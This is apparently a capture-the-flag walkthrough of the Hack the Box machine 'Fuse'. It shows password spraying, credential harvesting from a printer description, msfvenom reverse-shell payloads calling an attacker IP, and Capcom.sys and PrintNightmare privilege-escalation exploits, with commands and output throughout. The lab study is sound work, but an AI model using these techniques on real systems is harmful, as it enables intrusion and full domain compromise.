HTB Fuse - lmiyasato/lenny-hacking GitHub Wiki
Hack the Box - Fuse
Fuse utilizes exploiting a print server which also runs as a domain controller (I will throw in the printer nightnamare exploit at the end for more fun and giggles).
Skills used
- Enumeration
- SMB
- Website Scraping (for password list generation)
- Password Spraying
- Privilege Abuse (SeLoadDriverPrivlege)
- Powershell (Evil WinRM)
- Privelege Escalation (SeLoadDriverPrivlege, Print Nightmare)
Enumeration / Initial Access
Nmap / Port Scanning
Tool used: nmap - World's most well known port scanner.
Run an nmap scan (normally start with all ports, but will use the known open ports for brevity)
kali@kali:~/Documents/HTB/fuse$ nmap -n -p 53,80,88,135,139,445,464,593,636,3268,3269,5985 -Pn -vvv 10.10.10.193 -oN nmap.fuse2
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-30 18:37 EDT
Initiating Connect Scan at 18:37
Scanning 10.10.10.193 [12 ports]
Discovered open port 139/tcp on 10.10.10.193
Discovered open port 445/tcp on 10.10.10.193
Discovered open port 135/tcp on 10.10.10.193
Discovered open port 80/tcp on 10.10.10.193
Discovered open port 53/tcp on 10.10.10.193
Discovered open port 3269/tcp on 10.10.10.193
Discovered open port 636/tcp on 10.10.10.193
Discovered open port 593/tcp on 10.10.10.193
Discovered open port 464/tcp on 10.10.10.193
Discovered open port 88/tcp on 10.10.10.193
Discovered open port 5985/tcp on 10.10.10.193
Discovered open port 3268/tcp on 10.10.10.193
Completed Connect Scan at 18:37, 0.34s elapsed (12 total ports)
Nmap scan report for 10.10.10.193
Host is up, received user-set (0.17s latency).
Scanned at 2021-07-30 18:37:20 EDT for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
SMB - TCP/445
Tool used: crackmapexec - linux based tool to assess active directory based networks. Tool abuses built-in active directory features & protocols to evade endpoint protection & IDS/IPS tools.
Using this tool allows enumeration of the OS and domain
kali@kali:~/Documents/HTB/fuse$ crackmapexec smb 10.10.10.193
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
Tool used: smbmap - linux based tool for smb enumeration.
Using this tool shows null (un-authenticated) authentication will not grant access. This is good. The -H switch tells the tool to scan the 10.10.10.193 host. The -U switch tells the tool to use a null authentication
kali@kali:~/Documents/HTB/fuse$ smbmap -H 10.10.10.193
[+] IP: 10.10.10.193:445 Name: 10.10.10.193
kali@kali:~/Documents/HTB/fuse$ smbmap -H 10.10.10.193 -u null
[!] Authentication error on 10.10.10.193
Website - TCP/80
Browsing directly to 10.10.10.193 will receive a 200 code ("OK") but will present a redirect to http://fuse.fabricorp.local
kali@kali:~/Documents/HTB/fuse$ wget -q -O - http://10.10.10.193
<meta http-equiv="refresh" content="0; url=http://fuse.fabricorp.local/papercut/logs/html/index.htm" />
Modify your /etc/hosts file to map 10.10.10.193 to fuse.fabricorp.local and fabricorp.local
Visiting fabricorp.local will bring up the PaperCut print logger webpage. (pic 1)
The pages will give you more useful information about the print jobs (such as user names). With that info, a list of users will be created:
pmerton
tlavel
sthompson
bhult
administrator
Password Spraying / Guessing
Password spraying is typically used to attempt to guess a large number of passwords with a commonly used password. In this case, I only have five accounts to work with so I will come up with a custom password list by scraping passwords off the webpage.
Tool used: cewl - A custom wordlist generator which can scrape website.
The --with-numbers switch tells the tool to accept words with numbers in as well as just letters.
kali@kali:~/Documents/HTB/fuse$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist
Tool used: hydra - multiprotocol password cracker used with wordlist. Protocols include http, ftp, ldap, and much more!
The -L switch uses the users.txt as a list of users to try and the -P switch uses the wordlist we just created as a list of passwords to try. The -I switch overwrites the previous session and kicks off immediately. For verbose option, use the -v switch as well. This part will take about 2 minutes for the first cracked password.
kali@kali:~/Documents/HTB/fuse$ hydra -I -L users.txt -P wordlist 10.10.10.193 smb
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-30 19:43:15
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 850 login tries (l:5/p:170), ~850 tries per task
[DATA] attacking smb://10.10.10.193:445/
[STATUS] 116.00 tries/min, 116 tries in 00:01h, 734 to do in 00:07h, 1 active
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01
[STATUS] 136.33 tries/min, 409 tries in 00:03h, 441 to do in 00:04h, 1 active
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-30 19:49:33
Gaining initial access
Users tlavel and bhult seem to have an initial (default) password of Fabricorp01. From looking at the hydra logs, it also shows that the password expired and must be changed on the next logon.
Will use smbmap to gain initial access:
kali@kali:~/Documents/HTB/fuse$ smbmap -u tlavel -p Fabricorp01 -H 10.10.10.193
[!] Authentication error on 10.10.10.193
kali@kali:~/Documents/HTB/fuse$ smbmap -u bhult -p Fabricorp01 -H 10.10.10.193
[!] Authentication error on 10.10.10.193
Tool used: smbclient - command line client to access SMB/CIFS resources on servers, similar to smbmap, part of samba suite
This will show that the "password must change" checkbox is checked off...
kali@kali:~/Documents/HTB/fuse$ smbclient -L fuse.htb -U bhult
Enter WORKGROUP\bhult password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
Tool used: smbpasswd - command line client to change passwor used for SMB sessions, part of Samba suite.
Perhaps changing the password will help...
kali@kali:~/Documents/HTB/fuse$ sudo smbpasswd -r 10.10.10.193 -U tlavel
[sudo] password for kali:
Old SMB password:
New SMB password: *** Set to Password123 ***
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.
Tool used: rpcclient - command line tool initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.
Use rpcclient to gain a connection to the system for further enumeration:
kali@kali:~/Documents/HTB/fuse$ rpcclient -U FABRICORP\\tlavel fuse.htb
Enter FABRICORP\tlavel's password:
rpcclient $>
From here, we can enumerate the system further to gain more information:
rpcclient $> querydispinfo
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x109c RID: 0x1db2 acb: 0x00000210 Account: astein Name: (null) Desc: (null)
index: 0x1099 RID: 0x1bbd acb: 0x00020010 Account: bhult Name: (null) Desc: (null)
index: 0x1092 RID: 0x451 acb: 0x00020010 Account: bnielson Name: (null) Desc: (null)
index: 0x109a RID: 0x1bbe acb: 0x00000211 Account: dandrews Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x109d RID: 0x1db3 acb: 0x00000210 Account: dmuir Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x109b RID: 0x1db1 acb: 0x00000210 Account: mberbatov Name: (null) Desc: (null)
index: 0x1096 RID: 0x643 acb: 0x00000210 Account: pmerton Name: (null) Desc: (null)
index: 0x1094 RID: 0x641 acb: 0x00000210 Account: sthompson Name: (null) Desc: (null)
index: 0x1091 RID: 0x450 acb: 0x00000210 Account: svc-print Name: (null) Desc: (null)
index: 0x1098 RID: 0x645 acb: 0x00000210 Account: svc-scan Name: (null) Desc: (null)
index: 0x1095 RID: 0x642 acb: 0x00020010 Account: tlavel Name: (null) Desc: (null)
Took the output, put it in a file, parsed the file to strip out the user name with the following
cat users2.txt |cut -d ':' -f 5 | awk '{print $1}'
Given the theme of this box, it would make sense to enumerate the printers as well.
kali@kali:~/Documents/HTB/fuse$ rpcclient -U FABRICORP\\bhult 10.10.10.193
Note: Use tlavel's account w/the password of Password01 which is known to work.
Enter FABRICORP\bhult's password:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Tool used: Crackmapexec - a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
From looking at the description, looks like the administrator put the "scan2docs" password as $fab@s3Rv1ce$1 . Since it is a service account there is some chance it could be recycled amongst other service accounts. With this password spray attack, we were able to uncover that the svc-print and svc-scan accounts share the scan2docs password.
kali@kali:~/Documents/HTB/fuse$ crackmapexec smb 10.10.10.193 -u users3.txt -p '$fab@s3Rv1ce$1' --continue-on-success
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [+] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bhult:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\astein:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE
Tool used: Evil WinRM - the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol
Now to use evil-winrm to open a shell with user access.
kali@kali:~/Documents/HTB/fuse$ evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> cd ..
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print> cd desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\desktop> cat user.txt
db0a897cb4a1d0705f145c54694827c3
Detection from enumeration
- Know what executables are executed on the system and what they do.
- Enumeration is not limited to Nmap or network scanning tools. Enumeration is basically information gathering such as a list of users, administrators, groups, etc. Information gathering is critical for a hacker so they have an understanding what they will need to break into the target system. Enumeration can also be easily done with Powershell, Python, and built-in operating system tools.
Privilege Escalation to SYSTEM
Do a quick "whoami /priv" to find out what privileges does svc-print have.
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The svc-print account has the SeLoadDriverPrivilege privilege. Accounts with the "Load / Unload device drivers" privileges are able to escalate their privilege to the system (admin) level. More information can be found in this article: https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
Also, more indepth privilege abuse information can be found in this PDF powerpoint stack: https://2018.romhack.io/slides/RomHack%202018%20-%20Andrea%20Pierini%20-%20whoami%20priv%20-%20show%20me%20your%20Windows%20privileges%20and%20I%20will%20lead%20you%20to%20SYSTEM.pdf
And even more, to simplify this, the pre-compiled executables can be found here (but you will have to pre-compile your custom shell.exe): https://github.com/mach1el/htb-scripts/tree/master/exploit-fuse
Create your shell.exe which is basically a reverse tcp shell:
kali@kali:~/Documents/HTB/fuse/EoPLoadDriver$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=999 -f exe -o shell.exe
Within the evil-WinRM shell, upload the contents from the github with the pre-compiled executables into the C:\temp directory:
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> upload Capcom.sys
Info: Uploading Capcom.sys to C:\Users\svc-print\Documents\Capcom.sys
Info: Upload successful!
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> upload EOPLOADDRIVER.exe
Info: Uploading EOPLOADDRIVER.exe to C:\Users\svc-print\Documents\EOPLOADDRIVER.exe
Info: Upload successful!
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> upload ExploitCapcom_modded.exe
Info: Uploading ExploitCapcom_modded.exe to C:\Users\svc-print\Documents\ExploitCapcom_modded.exe
Info: Upload successful!
up[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documentsupload nc.exe
Info: Uploading nc.exe to C:\Users\svc-print\Documents\nc.exe
Info: Upload successful!
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> upload netcat.bat
Info: Uploading netcat.bat to C:\Users\svc-print\Documents\netcat.bat
Info: Upload successful!
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-print\Documents> upload shell.exe
Info: Uploading shell.exe to C:\Users\svc-print\Documents\shell.exe
Info: Upload successful!
Within the C:\temp directory, run the following command:
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\Capcom.sys
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
Run the listener with the following command:
sudo nc -nvlp 999
Then run the ExploitCapcom_modded.exe command
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\temp> .\ExploitCapcom_modded.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 00000140C54C0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
From here, you should get your system shell!
[sudo] password for kali:
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::999
Ncat: Listening on 0.0.0.0:999
Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:51176.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
Bonus 1: Using the print nightmare for privilege escalation (CVE-2021-1675)
Print Nightmare (Local Privilege Escalation Version / CVE-2021-1675):
Reference site: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
Download the powershell source code:
Upload the CVE-2021-1675.ps1 powershell file into the target box and run the following commands:
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser Lenny1 -NewPassword Password1
evil-winrm -i 10.10.10.193 -u Lenny1 -p Password1
From here, Evil-WinRM was used to log in as user "Lenny1" and it is a local administrator account:
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Lenny1\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
badguy
Domain Admins
Enterprise Admins
Lenny1
oki
The command completed successfully.
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Lenny1\Documents>
Bonus 2: Using the print nightmare for privilege escalation - Remote Code Execution (CVE-2021-34527)
This Version is also a print nightmare privilege escalation but it is the remote code execution version.
Reference site: https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
Will use the compromised box as the smb server for the purposes of this demo. For some reason, I can't get the SMB server to work on my Kali box to work anonymously.
With the previous exploitation from print nightmare #1, I will create a share:
net share temp=C:\temp /grant:everyone,FULL
Create the evil dll file using msfvenom and copy it to the /tmp folder
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=666 -o evildll.dll
Download python script from reference site, install/re-install impacket if necessary
Open a reverse shell listener listening on port 666:
sudo nc -nvlp 666
Use the python script as follows:
kali@kali:~/Documents/tools/print_nightmare/CVE-2021-34527/PrintNightmare-CVE-2021-34527$ sudo python3 CVE-2021-34527.py svc-print:'$fab@s3Rv1ce$1'@fuse.htb '\\10.10.10.193\temp\evildll.dll'
Enjoy shell!
kali@kali:~/Documents/tools/print_nightmare/CVE-2021-34527/PrintNightmare-CVE-2021-34527$ sudo nc -nvlp 666
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::666
Ncat: Listening on 0.0.0.0:666
Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:50371.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system